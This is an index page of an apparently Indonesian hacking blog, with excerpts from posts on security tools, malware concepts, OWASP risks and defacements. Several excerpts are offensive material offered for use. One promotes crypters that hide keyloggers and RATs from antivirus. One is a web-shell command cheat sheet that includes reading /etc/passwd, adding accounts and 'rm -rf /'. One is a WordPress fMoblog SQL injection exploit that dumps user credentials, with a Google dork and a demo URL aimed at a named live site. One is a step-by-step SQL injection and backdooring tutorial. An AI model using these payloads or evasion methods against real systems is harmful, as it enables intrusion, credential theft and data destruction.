Skip to main content

Posts

Showing posts with the label Hacking

Fix HTTPS issue in browser - Burp Suite

If you get message "Software is Preventing Firefox From Safely Connecting to This Site. Most likely a safe site, but a secure connection could not be established. This issue is caused by The original certificate provided by the web server is untrusted., which is either software on your computer or your network." lets see the tutorial. 1. With Burp suite running, visit http://burp in your browser and click the "CA Certificate" link to download and save your Burp CA certificate. Remember where you save the Burp CA certificate.

Tinfoleak - Twitter Open Source Intelligence Tool

tinfoleak is an open-source tool within the OSINT (Open Source Intelligence) that automates the extraction of information on Twitter and facilitates subsequent analysis for the generation of intelligence. Taking a user identifier, geographic coordinates or keywords, tinfoleak analyzes the Twitter timeline to extract great volumes of data and show useful and structured information to the intelligence analyst. tinfoleak is included in several Linux Distros: Kali, CAINE, BlackArch and Buscador. It is currently the most comprehensive open-source tool for intelligence analysis on Twitter.

All About Crypter

What is a Crypter? A Crypter is a software encryption which encrypts your viruses, keyloggers, RATS or any other hacking tool from becoming detected by Antiviruses. A Crypter makes Antiviruses pretty much useless. This is because when encrypting any malware tool, the Crypter uses various encryption methods to bypass Antiviruses from analysing the output. What does Scantime and Runtime mean? Scantime is a method used to bypass Antiviruses from analysing your encrypted files, while real time protection is enabled.Runtime is used to bypass Antiviruses when the encrypted file is executed. The Runtime method then decrypts the encryption in the memory. Generally all Crypters use the Scantime and Runtime method. What is the Stub? The Stub is packed with junk or undetected code to help your encrypted file stay fully undetected for some time or maybe even weeks. When the stub eventually becomes detected, the file becomes detected by antiviruses when executed on the machine.

Malware, apakah itu?

Secara definitif malware adalah kode jahat, maka ia mencakup worm, trojan, virus, spyware / adware, rootkit, bots, exploit, backdoor, dll. Kali ini saya akan bahas yang paling umum saja; virus, worm, spyware, trojan

REMnux - A Linux Distribution for Reverse Engineering Malware

Setelah sekian lama gk posting, akhirnya sempet jg nulis di blog :p Kali ini gw sekedar share OS khusus dibuat untuk malware reverse-engineering, recomended dari ane nih.wekeke REMnux yang distribusikan khusus pada Linux telah dirilis sampai v4. Sistem operasi ini berfungsi untuk melakukan malware reverse-engineering, termasuk alat untuk melakukan analisis forensik pada memori serta analisis file PDF yang berpotensi berbahaya. REMnux pertama kali dirilis tahun 2011 dan merupakan karya Lenny Zeltser, seorang ahli malware dan instruktur SANS. Remnux dirancang untuk menciptakan suatu lingkungan mandiri yang menganalisis dan melakukan malware reverse-engineering, aplikasi berbahaya lainnya dan website. File ini dapat di download secara terpisah dan di jalankan melalui CD atau virtual drive.

E-Book Owasp Top Ten 2013

OWASP (Open Web Application Security Project) The Ten Most Critical Web Application Security Risks

Android WordPress Vulnerability Scanner

aWPVSCAN adalah Android WordPress Vulnerability Scanner yaitu aplikasi android ditulis dalam ruby dibuat untuk menemukan kelemahan yang terdapat dalam website yang berbasis WordPress. Dimaksudkan menggunakannya untuk untuk profesional keamanan atau administrator Wordpress untuk menilai seberapa besar keamanan website WordPress mereka.

Protecting Website from Common Attacks

------------------------------------------------------/ [-] Title : Protecting website from common attacks [-] Date : 08-08-2010 [-] Author : vYc0d [-] Contact : vyc0d@hackermail.com [-] Web : http://vyc0d.blogspot.com [-] Language : Indonesian ------------------------------------------------------/ Konten : [1] Pendahuluan [2] Cross Site Scripting [3] SQL Injection \_ Login Form Bypassing \_ UNION SQL Injection [4] File Inclusion [5] Special Thanks [1] Pendahuluan Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman yang memungkinkan attacker untuk dapat menyusup ke dalam website. [2] Cross Site Scripting Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman web y...

TuxCut, Pemotong Koneksi Client

TuxCut , sebuah aplikasi yang dapat digunakan untuk memotong akses internet pada hotspot, atau sebuah PC LAN workgroup dari client ke server atau sebaliknya dengan memanfaatkan protokol ARP. Program ini dipergunakan oleh pengguna jaringan yang jail dan ingin mengambil jatah bandwith untuk dipakai sendiri. Tuxcut di buat dari bahasa PyQt, untuk lebih jelasnya bisa langsung mengunjungi situs resminya di http://bitbucket.org/a_atalla/tuxcut/src/ Di dalam Tuxcut sudah di bundel fitur buat memproteksi kita agar koneksi internet kita tidak bisa dicut atau di potong oleh user lain. Selain itu, ada fitur buat mac scanning dan mac changer-nya juga. Sebaliknya untuk Netcut, agar kita terproteksi dari user jail yang memakai Netcut, kita harus menginstall program lagi yakni AntiNetcut (meski netcut selalu lebih maju dari anti netcut). Untuk cara penginstalannya, disini saya menggunakan sistem operasi berbasis Ubuntu linux. 1. Download TuxCut, karena kita mau menginstall di kubuntu, kita download d...

Perintah WebShell

Sudah pada punya web shell blm??? Pasti udah :D sekedar berbagi beberapa command yang bisa dijalankan pada web shell cat ./../mainfile.php = Config file. ls -la = Lists directory's. ifconfig {eth0 etc} = Ipconfig equiv. ps aux - Show running proccess's. gcc in_file -o out_file - Compile c file. cat /etc/passwd - List's accounts. sudo - Superuser Do run a command as root provided you have perms in /etc/sudoers. id - Tells you what user your logged in as. which wget curl w3m lynx - Check's to see what downloaders are present. uname -r - Shows all release info (or) cat /etc/release. uname -a - Shows all kernal info (or) cat /etc/issue last -30 - Last logged 30 ip's can change to desired number. useradd - Create new user account. usermod - Modify user account. w - See who is currently logged on. locate password.txt - Locates password.txt in current dur can use *. rm -rf / - Please be carefull with this command, i cannot stress this enough. arp -a - Lists other machines ...

Serangan Umum Internet di 2009

Sepanjang tahun 2009 ini, gelombang serangan terhadap pengguna internet di seluruh dunia tak habis-habisnya menghadang. Symantec, salah satu pemain utama di bidang keamanan mencatat beberapa metode utama serangan yang marak hadir tahun ini. Drive-by Download Semakin Banyak Penyerang menginfeksi komputer penjelajah internet secara diam-diam dengan menyusup di situs legal. Popularitas metode ini terus tumbuh. Di tahun 2008, Symantec mengamati sebanyak 18 juta percobaan serangan drive-by download; akan tetapi, dari Agustus sampai Oktober 2009 sendiri, Symantec mencatat terjadi sebanyak 17,4 juta serangan. Kembalinya Intensitas Spam ke Sebelum McColo Symantec melihat penurunan sebesar 65 persen dari jumlah total pesan spam dalam 24 jam setelah penutupan McColo di akhir 2008 dan 24 jam setelahnya, jumlah spam turun mencapai level 69,8 persen dari seluruh email. Akan tetapi, di 2009, volume keseluruhan spam kembali ke angka rata-rata 87,4 persen dari seluruh email, mencapai maksimum 95 perse...

10 reasons Websites get Hacked

Below you will find list of top 10 web vulnerabilities classified by OWASP, here is also description of the problem and some examples. I will just give you the list in case you missed it before, i will not comment on any of these as there is already hot discussion about this matter on several sites/forums. So here it starts: 1. Cross site scripting (XSS) The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks. Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site, according to Snyder. Real-world example: PayPal was targete...

Wordpress Plugin fMoblog Remote SQL Injection Vulnerability

############################################################# # Wordpress Plugin fMoblog Remote SQL Injection Vulnerability # Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/ # Plugin Version: 2.1 # Author: strange kevin # Email: strange.kevin@gmail.com # Google Dork: "Gallery powered by fMoblog" ############################################################## # Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- # Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- ############################################################## # Greetz: str0ke and milw0rm.com ##############################################################

Tutorial SQL Injection + Backdooring

---->>> 1 Kita tetapkan target terlebih dahulu contoh: [site]/news_Event/newsDetail.php?ID=2 Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln. contoh: [site]/news_Event/newsDetail.php?ID=-2 atau [site]/news_Event/newsDetail.php?ID=2' ---->>> 2 mencari dan menghitung jumlah table yang ada dalam databasenya... gunakan perintah : +order+by+ contoh: [site]//news_Event/newsDetail.php?ID=-2+order+by+1-- sekarang cek secara satu per satu contoh: [site]/news_Event/newsDetail.php?ID=-2+order+by+1-- [site]/news_Event/newsDetail.php?ID=-2+order+by+2-- [site]/news_Event/newsDetail.php?ID=-2+order+by+3-- [site]/news_Event/newsDetail.php?ID=-2+order+by+4-- sehingga muncul error atau hilang pesan error... misal: [site]/news_Event/newsDetail.php?ID=-2+order+by+5-- berarti yang kita ambil adalah sampai angka 4 menjadi [site]/news_Event/newsDetail.php?ID=-2+order+by+4-- --->>> 3 untuk mengeluarkan angka berapa ya...

Microsoft, HSBC, Sony, F-secure,(...) New Zealand H4ck3d

Iseng2 maen ke Zone-H, g' sengaja liat situs2 penting di New Zealand di Deface ui.... Pelakunya adalah Peace Crew mereka terdiri dari nick Thehacker, Agd_Scorp, rx5. Dan mereka meninggalkan beberapa pesan yaitu "STOP THE WAR ISRAEL" MirorX dapat diliat di http://www.zone-h.org/mirror/id/8791434 http://www.zone-h.org/mirror/id/8791688 http://www.zone-h.org/mirror/id/8791650 http://www.zone-h.org/mirror/id/8791497 situs yg lainnya kalian sendiri aja ke http://www.zone-h.org/news/id/4708 sumber : www.zone-h.org